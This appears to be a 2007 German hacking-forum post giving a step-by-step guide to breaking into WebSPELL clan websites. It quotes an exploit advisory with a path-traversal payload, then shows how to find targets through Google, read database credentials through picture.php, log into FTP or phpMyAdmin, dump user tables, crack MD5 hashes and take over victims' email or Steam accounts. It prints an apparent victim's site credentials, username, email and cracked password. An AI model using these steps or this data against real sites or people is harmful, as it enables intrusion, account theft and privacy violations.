Vollständige Version anzeigen : [Hacking] Webspell ganz einfach via Exploit hacken


°EraZoR°
19.07.2007, 16:14

Webspell hacken via Exploit

Das Exploit:

# WebSPELL <= 4;01;02 (picture;php) Remote File Disclosure Vulnerability
# Discovered by: Trex
# Visit: ;;Trex-Online~net / ;;UnderGround~ag
# Comment: Happy easter!
#
# ___ ___
# / \ / \ ___________________________
# / / \_/ \ \ / \
# \__/\ /\__/ / GIVE ME A CARROT OR I WILL \
# \O O/ \ BLOW UP YOUR HOUSE /
# ___/ ^ \___ / ___________________________/
# \___/ /_/
# _/ \_
# __// \\__
# /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (= on).
#
# ;[SITE][PAHT]/picture;php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4;3;0).
#
# ;[SITE][PAHT]/picture;php?id=.;/.;/.;/[FILE]%00
#
#
#
# Solution:
# ;fixes;trex-online~net/picture;rar

# milw0rm~com [2007-04-05]

found by (;;;milw0rm~com)


So das ganze ist sehr einfach.
Ihr geht auf Google (;;;google~de) und sucht nach:
XTREAM-TEAM-CLAN
oder ihr habt eine Seite die ihr hacken wollt...

Ich nehme jetzt als Beispiel die Seite ";hossi;ho;ohost~de/"

Von den Ergebnissen sucht ihr euch eine Seite aus und öffnet sie.
Nun ersetzt ihr das:
;hossi;ho;ohost~de/index;php?site=news&action=archive
mit:
;hossi;ho;ohost~de/picture;php?file=_mysql;php
um Zugriff auf die MySQL-Datenbank zu erhalten, wo die User-Daten gespeichert sind.

Nun geht ihr auf die Seite:
;hossi;ho;ohost~de/picture;php?file=_mysql;php
und es erscheint eine weiße Seite.
Ist aber alles richtig, deswegen macht einen Rechtsklick und geht auf:
"Seitenquelltext anzeigen"

Nun seht ihr die MySQL-Daten, sprich Passwort und Usernamen.
Bei unserem Beispiel sieht das ganze dann so aus:
<?php
$host = "localhost";
$user = "hossi";
$pwd = "darkkrone2";
$db = "hossi";
define(PREFIX, 'webs_');
?>


Der Username ist also:
"hossi"
Und das Passwort:
"darkkrone2"

Ihr habt 2 Möglichkeiten:

1. Ihr loggt euch auf dem FTP der Homepage ein

Ihr öffnet euren FTP-Clienten und gebt:
";eureseite;de"
ein.
Also:
";hossi;ho;ohost~de/"
Gebt Username und Passwort ein und könntet jetzt die ganze Page löschen...

2. Ihr hackt die Datenbank

Ihr geht auf:
phpmyadmin;eureseite~de
also:
phpmyadmin;hossi;ho;ohost~de/

Nun geben wir die Daten ein und sehen die MySQL Datenbank.
Ihr geht ganz links auf den Username also im Bsp:
"hossi (66)" <- die 66 bedeutet die Anzahl der Tabellen...
scrollt ganz nach unten und geht bei "webs_user" auf ;;0;xup~in/exec/ximg;php?fid=18505741.

Nun seht ihr die Login-Namen, Passwörter, E-Mail-Adressen und alles andere was die User zu sich angegeben haben.
Ihr sucht euch einen User aus, kopiert den Passwort-Hash...
In unserem Beispiel nehme ich:
Username:
shadow_TZ
Passwort-Hash:
e2d8001eb66b01bd0601c1d3b23c9028
E-Mail:
(zenkerthorsten;web~de)

Jetzt gehen wir auf:
md5cracker~de - de beste bron van informatie over md5cracker. Deze website is te koop! (;;;md5cracker~de/crack;php)
geben den Hash dort ein und erhalten:
GDataOnline - Hash gefunden - Plain: shadow88

Das Passwort ist also "shadow88".

Jetzt habt ihr wieder 2 Möglichkeiten:

1. Ihr könnt euch im E-Mail Acc einloggen:
Ihr geht auf die Seite des E-Mail Hosters und loggt euch mit der E-Mail-Adresse und Passwort ein.
Sollte das Passwort das gleiche sein wie auf der Clan-Page könnt ihr seinen Steam-Account o;ä. abziehen.

2. Ihr loggt euch auf der Clan-Page ein.
Ihr geht also zurück auf die Clan-Page und loggt euch ein.
Wenn der User Admin-Rechte hat, könnt ihr News schreiben, User löschen etc.
Wenn nicht, ist das ganze relativ unwichtig.


Das wars schon....

Ich hoffe es hat euch gefallen und ihr gebt mir ne Bewertung...

Mfg
°EraZoR°

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Ähnliche Themen zu [Hacking] Webspell ganz einfach via Exploit hacken
  • Frage zu Webspell Exploit
    Hy, ich hab mal ne Frage ;) : Es gibt ja nen Exploit mit "picture;php?file=_mysql;php" und dazu hab ich nen Frage xD Manchmal bekommt man einen anderen Host zB. : <?php $host = "zensiert;1und1;de"; $user = "zensiert"; $pwd = "zensiert"; $db = "zensiert"; define(PREFIX, 'lennox_'); ?> Wie ko [...]

  • Webspell Exploit
    huhu, wenn du noch nichma weißt, wie du es ausführen musst, dann lass es lieber ;) is besser so ;) mfg halloween [...]

  • [Hacking] Webspell: Admin Passwörter hacken
    ier mal ein Tutorial wie man Webspell hackt ;) Also als erstes nehmen wir uns mal eine Seite die auf Webspell läuft. Ich habe mir diese hier genommen. (;goeclan;go;funpic~de/tesports/index;php?site=news) Nun fügen wir anstatt des /index;php?site=news wir dort nun: /admin/database;php?action=w [...]

  • [Hacking] Webspell hacken
    So, in diesem Tutorial werde ich euch zeigen, wie man ganz leicht eine Webspell Website hackt. Doch zuerst, was ist eigentlich Webspell? Unter Webspell versteht man ein sehr bekanntes Content-Management-System(kurz: CMS). Doch was ist jetzt wieder ein CMS? -> Content-Management-System – Wikipedia [...]



raid-rush.ws | Imprint & Contact pr